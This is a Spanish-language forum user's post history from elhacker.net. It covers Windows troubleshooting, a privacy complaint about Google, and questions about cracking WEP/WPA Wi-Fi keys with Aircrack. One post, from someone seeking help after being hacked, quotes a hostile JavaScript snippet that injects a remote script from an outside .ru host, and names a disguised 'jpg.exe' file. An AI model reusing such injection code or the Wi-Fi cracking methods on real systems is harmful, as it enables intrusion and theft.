elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Wireless en Windows / Re: Descifrando claves WEP/WPA con Commview for Wi-Fi y Aircrack en: 2 Marzo 2013, 00:24 am
Hola, a mi en la parte que dice "Ultimas conexiones IP" no me aparece nada pero en "Nodos" sí hay nodos y me aparecen los paquetes. Ya llegué a los 40000 IVs y todavía no pasa nada u.u me sigue pidiendo cada vez mas IVs. :-\
2  Seguridad Informática / Wireless en Windows / Re: despues de tener la passphrase ? en: 1 Marzo 2013, 20:35 pm
Hola darkgx, si te fijas bien aircrack-ng te esta arrrojando el mensaje " Passphrase not in dictionary ", eso quiere decir que no ha encontrado la pass.

De la otra captura con Cain, no se que decirte por que no lo he utilizado, pero me imagino que te estara pasando algo parecido que con aircrack-ng.

Saludos.

ah  :-( bueno, gracias por comentar. Pensé que ya había podido hacer algo. El tráfico que había capturado con commview, los guardé y los revisé con wireshark y me aparecía en la columna info: KEY. Supongo que hasta allí iba bien, bueno... quizás después pruebe con linux.

gracias
3  Seguridad Informática / Wireless en Windows / despues de tener la passphrase ? en: 1 Marzo 2013, 18:47 pm
--
4  Foros Generales / Noticias / Re: Entra en vigor la nueva política de privacidad de Google, entre fuertes ... en: 2 Marzo 2012, 15:39 pm
Esto no puede ser. Aunque haya gente que diga "Yo no tengo nada que esconder, que revisen lo que quieran", esto esta mal.  >:(

La verdad, no creo nada de lo que dicen, que solo quieren mas información por nuestro bien, para brindar un mejor servicio, (pfff) ¿quién se quejó del actual servicio? No quiero que un desconocido tenga todos mis datos, dirección, teléfono, Código Postal, etcétera.  Podría simplemente dejar de utilizar sus servicios pero ¿Quien podría vivir sin youtube? Si la mayoría de los video-tutoriales se encuentran en youtube y este es de google.

En facebook también quedas archivado (fotos, amigos, familiares, teléfono etcétera). ¿Es necesario tanta vigilancia?  :huh:

Ya sé que existen proxies para poder ocultarnos de esto último pero ¿Por qué debemos escondernos?. Creo que a las personas que practican el hack no les va  a gustar esto ya que quedan mas vulnerables, hay muchas más posibilidades de que estos sean atrapados así que, en fin, en cualquier momento se arma (?)

Saludos
5  Sistemas Operativos / Windows / Re: windows xp 32 y 7 64bits en: 8 Septiembre 2010, 21:50 pm
No se si andara, hasta donde se todo el hardware tiene q ser compatible si queres ponerle 64 Bits. Asi la verdad no estoy muy seguro de que te funcione :-\
6  Sistemas Operativos / Windows / Re: como averiguar la contraseña de inicio de sesion de windows en: 8 Septiembre 2010, 21:44 pm
Si tu sistema de archivo es NTFS podes usar el Cia Commander  :P
7  Sistemas Operativos / Windows / Re: Me va lento y se cuelga , instalacion del windows 7 en: 8 Septiembre 2010, 21:43 pm
No vayas a querer instalar Windows Seven en un disco que tenga 10 GB  :xD lo que quiero decir es que no todos los sistemas operativos pesan lo mismo. windows seven necesita almenos 120 GB libre :) para que pueda funcionar Optimamente
8  Sistemas Operativos / Windows / Re: Problema con PC [No Inicia] en: 2 Septiembre 2010, 20:36 pm
Te mande la solucion por PM  :D
9  Sistemas Operativos / Windows / Re: Problema con PC [No Inicia] en: 31 Agosto 2010, 06:28 am
Primero, fijate que no tengas ningun CD ni Diskette adentro. Parece que se te cago la tabla de particiones. hace esto

1.Mete CD WinXP
2.Anda a Reparar
3.En la consola FDISK/MBR
4.Reinicia, Intenta arrancar XP
5.Si no enciende, volves a la opsion Recuperar
6.En la consola FIXBOOT

Hacelo y contame como te fue. :)
10  Seguridad Informática / Seguridad / Re: Me hackearon y dejaron un regalo. ayuda! en: 15 Mayo 2010, 15:13 pm
Ahhh! el NOD32 me detecta muchas veces que mi pc ah querido conectarse a otro lado!! y esto me resulto familiar

Código
  1. function G(){ _l=document.createElement("script"); _l["defer"]="1"; _l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php"; document.body["appendChild"](_l);}
  2.  
  3.  
  4.  

ahora que lo veo bien me doy cuenta de esto:
Código:
_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
Ahora estas son algunas screenshot que saque de cuando mi pc o otra maquina remota se quiso conectar a mi. >:( Mientras digo que creo que esto fue por que un contacto mio del msn, me paso un link y yo lo clickie.. pero era una persona en quien confiaba, no suelo entrar a cualquier link raro pero bueno, no parecia tan raro este  :xD creo que de ahi viene todo esto y es la misma persona.





Bueno creo que ya se abran dado cuenta de que la direccion es la misma que la que mostro cgvwzq, tambien capture la ip y a que puerto se conecto.

Bueno despues de ver que se conecto a un puerto ( el 1125) lo blockee/cerre, pero despues se vuelve a conectar a otro puerto  :xD me re cago...

ahi esta la ip resuelta: ns208753.ovh.net , al parecer es una ip dinamica asique si bloqueo la ip igual va a segir   :-\ aunque hace 2 dias que no me alerta el antivirus.

El nombre del archivo era Abril06.jpg.exe no se como no me di cuenta  :xD . es el mismo tipo el que hackeo la web. debo tener algun keylogger  :huh:

Bueno ya no se que hacer le pase el NOD23, el RegSeeker y el Malwarebytes actualizado y no paso nada  :(

PD: Ya se que no se puede hacer doble post, pero quise aprovechar lo que dijo cgvwzq.

Saludos  :¬¬
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines